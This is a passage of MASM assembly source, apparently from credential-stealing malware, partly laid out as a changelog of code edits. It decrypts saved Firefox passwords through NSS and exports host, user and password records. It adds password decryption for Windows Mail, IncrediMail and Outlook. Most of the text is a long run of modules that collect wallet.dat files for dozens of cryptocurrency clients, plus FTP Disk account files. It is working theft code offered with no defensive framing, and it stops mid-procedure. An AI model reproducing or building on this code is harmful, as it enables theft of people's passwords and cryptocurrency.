			mov	user, NULL
			mov	pass, NULL
			
			.IF	mozilla_mode == MOZILLA_MODE_FTP_HTTP
				invoke	lstrlen, offset szMozillaFTP
				invoke	StrCmpNI, host, offset szMozillaFTP, eax
				IFDEF	GRAB_HTTP
				.IF	eax
					invoke	lstrlen, offset szMozillaHTTP
					invoke	StrCmpNI, host, offset szMozillaHTTP, eax
				.ENDIF
				.IF	eax
					invoke	lstrlen, offset szMozillaHTTPS
					invoke	StrCmpNI, host, offset szMozillaHTTPS, eax
				.ENDIF
				IFDEF	COLLECT_PROXY_SETTINGS
				.IF	eax
					invoke	lstrlen, offset szMozillaProxy
					invoke	StrCmpNI, host, offset szMozillaProxy, eax
				.ENDIF
				ENDIF
				ENDIF
			.ELSEIF mozilla_mode == MOZILLA_MODE_FIREFTP
				invoke	lstrlen, offset szMozillaFireFTP
				invoke	StrCmpNI, host, offset szMozillaFireFTP, eax
			.ELSEIF mozilla_mode == MOZILLA_MODE_EMAIL
				sub	eax, eax ; allow all hosts
			.ENDIF
			
			.IF	!eax
				; user (can be empty for some record types)
				.IF	user_cell_len
					invoke	MozillaNSSDecryptPassword, user_cell_data, user_cell_len
					mov	user, eax
				.ENDIF
				
				; pass
				invoke	MozillaNSSDecryptPassword, pass_cell_data, pass_cell_len
				mov	pass, eax
				
				.IF	host && pass
					; export recovered data
					invoke	StreamWriteDWORD, target_stream, item_id
					invoke	StreamWriteString, target_stream, host
					invoke	StreamWriteString, target_stream, user
					invoke	StreamWriteString, target_stream, pass
				.ENDIF 
			.ENDIF
			
			invoke	MemFree, user
			invoke	MemFree, pass
			invoke	MemFree, host
		.ENDIF

Line 8225 (code addition/deletion):
	ret
SQLiteProcessMozillaDataTable endp

SQLiteProcessMozillaSchemaTable proc stream, target_stream, row_array, cell_count, item_id
	LOCAL	cell_len: DWORD
	LOCAL	cell_type: DWORD
	LOCAL	cell_data: DWORD
	LOCAL	table_name: DWORD
	LOCAL	root_page: DWORD
	LOCAL	dwStatusCode: DWORD

	.IF	cell_count == 5
		; Validate table column count
		invoke	SQLiteGetRecordArrayCell, row_array, 2, addr cell_len, addr cell_type, addr cell_data
		.IF	cell_type == SQLITE_DATATYPE_STR
			m2m	table_name, cell_data
			invoke	lstrcmpi, table_name, offset szMozillaLoginTable
			.IF	!eax
				invoke	SQLiteGetRecordArrayCell, row_array, 0, addr cell_len, addr cell_type, addr cell_data
				.IF	cell_type == SQLITE_DATATYPE_STR
					invoke	lstrcmp, offset szSQLite3TableType, cell_data
					.IF	!eax
						invoke	SQLiteGetRecordArrayCell, row_array, 3, addr cell_len, addr cell_type, addr cell_data
						.IF	cell_type == SQLITE_DATATYPE_INT
							mov	eax, cell_data
							m2m	root_page, dword ptr[eax]
							
							invoke	SQLiteGetRecordArrayCell, row_array, 4, addr cell_len, addr cell_type, addr cell_data
							.IF	cell_type == SQLITE_DATATYPE_STR
								mov	dwMozillaActionURLIndex, -1
								mov	dwMozillaPassValueIndex, -1
								mov	dwMozillaUserValueIndex, -1

								invoke	SQLiteProcessSQL, cell_data, offset SQLiteProcessMozillaColDef
								mov	dwStatusCode, TRUE
								
								.IF	(dwMozillaActionURLIndex != -1) && (dwMozillaPassValueIndex != -1) && (dwMozillaUserValueIndex != -1)
									invoke	SQLiteReadPage, stream, target_stream, root_page, addr dwStatusCode, item_id, offset SQLiteProcessMozillaDataTable
								.ENDIF
							.ENDIF
						.ENDIF 
					.ENDIF	
				.ENDIF
			.ENDIF
		.ENDIF
		
Line 8271 (code deletion):
mov	dwSQLiteEncoding, eax etc....

Line 8272 (code edition):
SQLiteProcessMozillaSchemaTable endp

Line 8272 (code edition):
ProcessMozillaSQLiteFile proc target_stream, szSQLFileName, item_id

Line 8280 (code addition):
, item_id, offset SQLiteProcessMozillaSchemaTable

Line 8290 (code edition/remove):
ProcessSQLiteFile endp -> ProcessMozillaSQLiteFile endp
ChromeAppDataCommonSingleFileScan procedure deleted.

Line 8299 (comment added):
; Tested: Google Chrome 29.0.1547.66 m

Line 8374 (code edition):
ProcessSQLiteFile -> ProcessChromeSQLiteFile
Line 8375 (code edition):
ProcessSQLiteFile -> ProcessChromeSQLiteFile

Line 9307 (procedure rename, check Line 198):
			invoke	IsDataAlreadyProcessed, map.lpMem, map.dwFileSize

Line 10932 (code addition):
	mov	byte ptr[CWindowsMailPasswordList+1], 'P'
	mov	byte ptr[CWindowsMailSMTPPass+1], 'S'

Line 11392 (code addition):
	mov	byte ptr[CIncrediMailSMTPServer], 'S'
	mov	byte ptr[CIncrediMailSMTPPort], 'S'
	mov	byte ptr[CIncrediMailSMTPUser], 'S'
	mov	byte ptr[CIncrediMailSMTPPass], 'S'

Line 11622 (code deletion):
base_path, do_decrypt <- (removed 'do_encrypt')

Line 11734 (code deletion):
reg_key, S, 0 <- (removed '0')

Line 11959 (code addition):
	.IF	bListEncrypted
		mov	bListEncrypted, FALSE
		invoke	DecipherList, offset COutlookRegValues
		invoke	DecipherList, offset COutlookBinaryValues
		invoke	DecipherList, offset COutlookPassValues
		invoke	DecipherList, offset COutlookPassValues2
	.ENDIF

Line 12087 (code addition):
; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Bitcoin
; http://bitcoin.org
; Tested: 0.8.1-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_BITCOIN

.data
	CBitconWalletFile		db	'wallet.dat',0
	CBitcoinAppDataDir		db	'\Bitcoin',0

.code

GrabBitcoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_BITCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CBitcoinAppDataDir, offset CBitconWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabBitcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Electrum
; http://electrum.org/
; Tested: 1.7.3
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_ELECTRUM

.data
	CElectrumWalletFile		db	'electrum.dat',0
	CElectrumAppDataDir		db	'\Electrum',0

.code

GrabElectrum proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_ELECTRUM, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CElectrumAppDataDir, offset CElectrumWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabElectrum endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; MultiBit
; http://multibit.org
; Tested: 0.5.9
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_ELECTRUM

.data
	CMultiBitWalletFile		db	'.wallet',0
	CMultiBitAppDataDir		db	'\MultiBit',0

.code

GrabMultiBit proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_MULTIBIT, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CMultiBitAppDataDir, offset CMultiBitWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabMultiBit endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; FTP Disk
; Tested: ver 1.2
; SFTP: implemented

IFDEF COMPILE_MODULE_FTPDISK

.data
	CFTPDiskAccountsFile	db	'Accounts.ini',0
	CFTPDiskAppDataDir		db	'\Maxprog\FTP Disk',0

.code

GrabFTPDisk proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_FTPDISK, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CFTPDiskAppDataDir, offset CFTPDiskAccountsFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabFTPDisk endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Litecoin
; https://litecoin.org/
; Tested: v0.8.5.1-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_LITECOIN

.data
	CLitecoinWalletFile		db	'wallet.dat',0
	CLitecoinAppDataDir		db	'\Litecoin',0

.code

GrabLitecoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_LITECOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CLitecoinAppDataDir, offset CLitecoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabLitecoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Namecoin
; http://namecoin.info/
; Tested: 0.3.72
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_LITECOIN

.data
	CNamecoinWalletFile		db	'wallet.dat',0
	CNamecoinAppDataDir		db	'\Namecoin',0

.code

GrabNamecoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_NAMECOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CNamecoinAppDataDir, offset CNamecoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabNamecoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Terracoin
; http://www.terracoin.org/
; Tested: v0.8.0.2
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_TERRACOIN

.data
	CTerracoinWalletFile		db	'wallet.dat',0
	CTerracoinAppDataDir		db	'\Terracoin',0

.code

GrabTerracoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_TERRACOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CTerracoinAppDataDir, offset CTerracoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabTerracoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Bitcoin Armory
; https://bitcoinarmory.com/
; Tested: Version 0.90-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_BITCOINARMORY

.data
	CBitcoinArmoryWalletFile	db	'.wallet',0
	CBitcoinArmoryAppDataDir	db	'\Armory',0

.code

GrabBitcoinArmory proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_BITCOINARMORY, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CBitcoinArmoryAppDataDir, offset CBitcoinArmoryWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabBitcoinArmory endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; PPCoin (Peercoin)
; https://ppcoin.com/
; Tested: v.0.3.0ppc-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_PPCOIN

.data
	CPPCoinWalletFile			db	'wallet.dat',0
	CPPCoinAppDataDir			db	'\PPCoin',0

.code

GrabPPCoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_PPCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CPPCoinAppDataDir, offset CPPCoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabPPCoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Primecoin
; http://primecoin.org/
; Tested: v0.1.2xpm-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_PRIMECOIN

.data
	CPrimecoinWalletFile		db	'wallet.dat',0
	CPrimecoinAppDataDir		db	'\Primecoin',0

.code

GrabPrimecoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_PRIMECOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CPrimecoinAppDataDir, offset CPrimecoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabPrimecoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Feathercoin
; http://feathercoin.com/
; Tested: v0.6.4.4
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_PRIMECOIN

.data
	CFeathercoinWalletFile		db	'wallet.dat',0
	CFeathercoinAppDataDir		db	'\Feathercoin',0

.code

GrabFeathercoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_FEATHERCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CFeathercoinAppDataDir, offset CFeathercoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabFeathercoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; NovaCoin
; http://novaco.in/
; Tested: v0.4.4.0-g32a928e-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_NOVACOIN

.data
	CNovaCoinWalletFile			db	'wallet.dat',0
	CNovaCoinAppDataDir			db	'\NovaCoin',0

.code

GrabNovaCoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_NOVACOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CNovaCoinAppDataDir, offset CNovaCoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabNovaCoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Freicoin
; http://freico.in/
; Tested: v0.8.3.0-unk-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_FREICOIN

.data
	CFreicoinWalletFile			db	'wallet.dat',0
	CFreicoinAppDataDir			db	'\Freicoin',0

.code

GrabFreicoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_FREICOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CFreicoinAppDataDir, offset CFreicoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabFreicoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Devcoin
; http://devcoin.org/
; Tested: version 0.3.25.1-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_DEVCOIN

.data
	CDevcoinWalletFile			db	'wallet.dat',0
	CDevcoinAppDataDir			db	'\Devcoin',0

.code

GrabDevcoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_DEVCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CDevcoinAppDataDir, offset CDevcoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabDevcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Frankocoin
; http://frankos.org/
; Tested: v0.8.4.1-16-g5f1dafe-bet
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_FRANKOCOIN

.data
	CFrankocoinWalletFile			db	'wallet.dat',0
	CFrankocoinAppDataDir			db	'\Franko',0

.code

GrabFrankocoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_FRANKOCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CFrankocoinAppDataDir, offset CFrankocoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabFrankocoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; ProtoShares
; http://invictus-innovations.com/protoshares
; Tested: v0.8.5.0-unk-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_PROTOSHARES

.data
	CProtoSharesWalletFile			db	'wallet.dat',0
	CProtoSharesAppDataDir			db	'\ProtoShares',0

.code

GrabProtoShares proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_PROTOSHARES, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CProtoSharesAppDataDir, offset CProtoSharesWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabProtoShares endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Megacoin
; http://www.megacoin.co.nz
; Tested: v0.8.996.0MEGA-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_MEGACOIN

.data
	CMegacoinWalletFile				db	'wallet.dat',0
	CMegacoinAppDataDir				db	'\Megacoin',0

.code

GrabMegacoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_MEGACOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CMegacoinAppDataDir, offset CMegacoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabMegacoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Quarkcoin
; http://www.quarkcoin.com/
; Tested: v0.8.3.0-g09e437b-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_QUARKCOIN

.data
	CQuarkcoinWalletFile			db	'wallet.dat',0
	CQuarkcoinAppDataDir			db	'\Quarkcoin',0

.code

GrabQuarkcoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_QUARKCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CQuarkcoinAppDataDir, offset CQuarkcoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabQuarkcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; WorldCoin
; http://worldcoin.in
; Tested: v0.6.4.4-ga7433e7-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_WORLDCOIN

.data
	CWorldCoinWalletFile			db	'wallet.dat',0
	CWorldCoinAppDataDir			db	'\Worldcoin',0

.code

GrabWorldcoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_WORLDCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CWorldCoinAppDataDir, offset CWorldCoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabWorldcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Infinitecoin
; http://infinitecoin.com/
; Tested: v1.8.0.0
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_WORLDCOIN

.data
	CInfinitecoinWalletFile			db	'wallet.dat',0
	CInfinitecoinAppDataDir			db	'\Infinitecoin',0

.code

GrabInfinitecoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_INFINITECOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CInfinitecoinAppDataDir, offset CInfinitecoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabInfinitecoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Ixcoin
; http://ixcoin.org/
; Tested: 0.3.24.30-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_IXCOIN

.data
	CIxcoinWalletFile				db	'wallet.dat',0
	CIxcoinAppDataDir				db	'\Ixcoin',0

.code

GrabIxcoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_IXCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CIxcoinAppDataDir, offset CIxcoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabIxcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Anoncoin
; https://anoncoin.net
; Tested: v0.7.4b-5-gd36ff9d-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_IXCOIN

.data
	CAnoncoinWalletFile				db	'wallet.dat',0
	CAnoncoinAppDataDir				db	'\Anoncoin',0

.code

GrabAnoncoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_ANONCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CAnoncoinAppDataDir, offset CAnoncoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabAnoncoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; BBQcoin
; http://bbqcoin.org/
; Tested: v0.6.3.0-unk-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_BBQCOIN

.data
	CBBQcoinWalletFile				db	'wallet.dat',0
	CBBQcoinAppDataDir				db	'\BBQcoin',0

.code

GrabBBQcoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_BBQCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CBBQcoinAppDataDir, offset CBBQcoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabBBQcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Digitalcoin
; http://digitalcoin.co/en/
; Tested: v1.0.0.0-g3aaa7ba-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_DIGITALCOIN

.data
	CDigitalcoinWalletFile				db	'wallet.dat',0
	CDigitalcoinAppDataDir				db	'\Digitalcoin',0

.code

GrabDigitalcoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_DIGITALCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CDigitalcoinAppDataDir, offset CDigitalcoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabDigitalcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; MinCoin
; http://www.min-coin.org/
; Tested: v0.6.5.0-g498f5d1-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_MINCOIN

.data
	CMincoinWalletFile					db	'wallet.dat',0
	CMincoinAppDataDir					db	'\Mincoin',0

.code

GrabMincoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_MINCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CMincoinAppDataDir, offset CMincoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabMincoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; GoldCoin
; http://gldcoin.com/
; Tested: v0.7.1.6-gcf3abdf39d-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_GOLDCOIN

.data
	CGoldcoinWalletFile					db	'wallet.dat',0
	CGoldcoinAppDataDir					db	'\GoldCoin (GLD)',0

.code

GrabGoldcoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_GOLDCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CGoldcoinAppDataDir, offset CGoldcoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabGoldcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; YaCoin
; http://www.yacoin.org/
; Tested: v0.4.0.0-g2nd-yac-wm-alpha
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_YACOIN

.data
	CYacoinWalletFile					db	'wallet.dat',0
	CYacoinAppDataDir					db	'\Yacoin',0

.code

GrabYacoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_YACOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CYacoinAppDataDir, offset CYacoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
